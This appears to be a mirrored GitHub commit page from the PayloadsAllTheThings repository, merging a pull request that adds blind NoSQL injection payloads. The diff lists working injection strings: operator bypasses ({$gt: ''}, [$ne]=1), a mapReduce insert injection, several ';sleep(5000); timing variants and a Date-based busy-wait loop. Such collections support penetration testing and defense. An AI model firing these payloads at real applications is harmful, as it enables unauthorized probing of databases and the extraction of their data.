mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-03-04 23:37:35 +00:00
Merge pull request #13 from soffensive/master
Added payloads to detect more reliably blind NoSQL injection
This commit is contained in:
commit
40fa20ec63
1 changed files with 2 additions and 0 deletions
|
@ -16,4 +16,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';sleep(5000);
|
||||
';sleep(5000);'
|
||||
';sleep(5000);+'
|
||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||
|
|
Loading…
Add table
Reference in a new issue